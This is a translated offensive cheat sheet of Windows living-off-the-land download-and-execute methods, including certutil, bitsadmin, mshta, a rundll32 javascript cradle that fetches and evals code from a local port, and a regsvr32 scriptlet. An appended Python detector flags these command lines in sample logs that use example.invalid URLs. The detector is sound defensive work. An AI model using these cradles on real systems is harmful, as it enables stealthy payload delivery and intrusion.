
Time: 2021-09-05 03:52:12

Not supported on Win2003 or WinXP

$client = New-Object System.Net.WebClient
$client.DownloadFile('', 'E:\file.tar.gz')

Downloading a file through IE

$ie = New-Object -Com internetExplorer.Application
$ie.Navigate("https://site.com/somefile")
#------------------------------
# Wait for the Download dialog box to pop up
Sleep 5
while($ie.Busy){Sleep 1}
#------------------------------
# Hit "S" on the keyboard to press the "Save" button on the download box
$obj = New-Object -Com WScript.Shell
$obj.AppActivate('Internet Explorer')
$obj.SendKeys('s')
# Hit "Enter" to save the file
$obj.SendKeys('{Enter}')
# Close the IE Downloads window
$obj.SendKeys('{TAB}')
$obj.SendKeys('{TAB}')
$obj.SendKeys('{TAB}')
$obj.SendKeys('{Enter}')

0x01 ftp

ftp 192.168.3.2

After entering the username and password:

lcd E:\file # change the local directory to E:\file

cd www # change to the www directory on the server

get access.log # download access.log from the server to E:\file

Reference: https://baike.baidu.com/item/ftp/13839

0x02 IPC$

copy \\192.168.3.1\c$\test.exe E:\file

0x03 Certutil

Reference: https://technet.microsoft.com/zh-cn/library/cc773087(WS.10).aspx

Applies to: Windows Server 2003, Windows Server 2003 R2, Windows Server 2003 with SP1, Windows Server 2003 with SP2

certutil.exe -urlcache -split -f file.txt

0x04 bitsadmin

Reference: https://msdn.microsoft.com/en-us/library/aa362813(v=vs.85).aspx

1. bitsadmin /rawreturn /transfer getfile E:\file\test.txt
2. bitsadmin /rawreturn /transfer getpayload E:\file\test.txt

0x05 msiexec

msiexec /q /i

0x06 IEExec

C:\Windows\Microsoft.NET\Framework\v2.0.50727> caspol -s off
C:\Windows\Microsoft.NET\Framework\v2.0.50727> IEExec

0x07 python

C:\python27\python.exe -c "import urllib2; exec urllib2.urlopen('').read();"

0x08 mshta

mshta

Contents of run.hta:

<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "cmd.exe /c net user" ' put the command here
self.close
</script>
</HEAD>
<body>
demo
</body>
</HTML>

0x09 rundll32

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8081/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}%

This still depends on the WScript.Shell component.

0x10 regsvr32

regsvr32 /u /s /i: scrobj.dll

Contents of test.data:

<?XML version="1.0"?>
<scriptlet>
<registration progid="ShortJSRAT" classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Learn from Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
ps = "cmd.exe /c calc.exe";
new ActiveXObject("WScript.Shell").Run(ps,0,true);
]]>
</script>
</registration>
</scriptlet>

You can also use https://github.com/CroweCybersecurity/ps1encode to generate the sct (COM scriptlet - requires a webserver to stage the payload).
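Every section above comes down to a signed Windows binary invoked with a telltale command line (certutil -urlcache, bitsadmin /transfer, msiexec /i with a URL, mshta / rundll32 / regsvr32 loading script, caspol -s off) plus, as the note on WScript.Shell points out, a script host spawning cmd.exe. The Python below is an added detection example and is not part of the original post: it parses constructed process-creation records (a simplified Sysmon Event ID 1 layout of timestamp, parent image, image and command line, tab-separated) and flags those patterns. The rule labels, the record layout, the `example.invalid` URLs and the assumption that the msiexec/IEExec arguments are http(s) URLs are all assumptions of this example.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class ProcessEvent:
    timestamp: str
    parent_image: str
    image: str
    command_line: str


@dataclass(frozen=True)
class Finding:
    technique: str      # label reusing the section numbers of the post (assumed naming)
    image: str
    command_line: str


# (label, image-name regex, command-line regex); everything is matched case-insensitively.
# The command-line regexes key on the distinguishing switches shown in the post.
COMMAND_RULES: List[Tuple[str, str, str]] = [
    ("0x00 powershell WebClient download", r"powershell(?:_ise)?\.exe$",
     r"net\.webclient|downloadfile\(|downloadstring\("),
    ("0x03 certutil urlcache download", r"certutil\.exe$", r"[-/]urlcache\b"),
    ("0x04 bitsadmin transfer download", r"bitsadmin\.exe$", r"/transfer\b"),
    ("0x05 msiexec install from URL", r"msiexec\.exe$", r"/i\s+https?://"),   # URL form assumed
    ("0x06 IEExec remote assembly", r"ieexec\.exe$", r"https?://"),           # URL form assumed
    ("0x06 caspol security off", r"caspol\.exe$", r"-s\s+off\b"),
    ("0x07 python inline urlopen", r"python\.exe$", r"urllib2?\b.*urlopen\("),
    ("0x08 mshta remote or HTA launch", r"mshta\.exe$", r"https?://|\.hta\b|(?:vb|j)script:"),
    ("0x09 rundll32 javascript RunHTMLApplication", r"rundll32\.exe$",
     r"javascript:|runhtmlapplication"),
    ("0x10 regsvr32 scrobj scriptlet", r"regsvr32\.exe$", r"/i:\S*.*scrobj\.dll"),
]

# The HTA, rundll32 and scriptlet samples all end in WScript.Shell.Run("cmd ..."),
# so a shell whose parent is one of those script hosts is flagged on lineage alone.
SCRIPT_HOST_PARENTS = re.compile(r"(?:mshta|rundll32|regsvr32)\.exe$", re.I)
SHELL_CHILDREN = re.compile(r"(?:cmd|powershell)\.exe$", re.I)


def parse_log(text: str) -> List[ProcessEvent]:
    """Parse constructed tab-separated records: timestamp, parent image, image, command line."""
    events = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split("\t", 3)
        if len(parts) != 4:
            raise ValueError(f"malformed record: {line!r}")
        events.append(ProcessEvent(*parts))
    return events


def match_event(ev: ProcessEvent) -> List[Finding]:
    """Return every rule a single process-creation event trips (possibly none)."""
    findings = []
    for label, image_re, cmd_re in COMMAND_RULES:
        if re.search(image_re, ev.image, re.I) and re.search(cmd_re, ev.command_line, re.I):
            findings.append(Finding(label, ev.image, ev.command_line))
    if SCRIPT_HOST_PARENTS.search(ev.parent_image) and SHELL_CHILDREN.search(ev.image):
        findings.append(Finding("script host spawned shell (WScript.Shell.Run)", ev.image, ev.command_line))
    return findings


def scan(text: str) -> List[Finding]:
    out: List[Finding] = []
    for ev in parse_log(text):
        out.extend(match_event(ev))
    return out


# Constructed sample records (not real telemetry). Lines 6-8 are benign controls.
SAMPLE_LOG = """\
# timestamp<TAB>parent image<TAB>image<TAB>command line
2021-09-05 03:52:12\tC:\\Windows\\explorer.exe\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\tpowershell -c "$c = New-Object System.Net.WebClient; $c.DownloadFile('http://example.invalid/file.tar.gz', 'E:\\file.tar.gz')"
2021-09-05 03:52:13\tC:\\Windows\\explorer.exe\tC:\\Windows\\System32\\certutil.exe\tcertutil.exe -urlcache -split -f http://example.invalid/file.txt file.txt
2021-09-05 03:52:14\tC:\\Windows\\System32\\cmd.exe\tC:\\Windows\\System32\\bitsadmin.exe\tbitsadmin /rawreturn /transfer getfile http://example.invalid/test.txt E:\\file\\test.txt
2021-09-05 03:52:15\tC:\\Windows\\explorer.exe\tC:\\Windows\\System32\\mshta.exe\tmshta http://example.invalid/run.hta
2021-09-05 03:52:16\tC:\\Windows\\System32\\mshta.exe\tC:\\Windows\\System32\\cmd.exe\tcmd.exe /c net user
2021-09-05 03:52:17\tC:\\Windows\\explorer.exe\tC:\\Windows\\System32\\regsvr32.exe\tregsvr32 /u /s /i:http://example.invalid/test.data scrobj.dll
2021-09-05 03:52:18\tC:\\Windows\\explorer.exe\tC:\\Windows\\System32\\certutil.exe\tcertutil -hashfile C:\\setup.exe SHA256
2021-09-05 03:52:19\tC:\\Windows\\explorer.exe\tC:\\Windows\\System32\\rundll32.exe\trundll32.exe shell32.dll,Control_RunDLL
2021-09-05 03:52:20\tC:\\Windows\\explorer.exe\tC:\\Windows\\System32\\notepad.exe\tnotepad.exe E:\\file\\access.log
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f.technique}] {f.image}: {f.command_line}")
```

Run against the constructed sample, the scanner reports six findings (the five download/execute command lines plus the cmd.exe child of mshta.exe) and stays silent on the benign certutil -hashfile, rundll32 control-panel and notepad records. The lineage rule is the one worth keeping even where command lines are obfuscated: whichever host loads the script, the post's samples all still reach WScript.Shell and a child shell.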
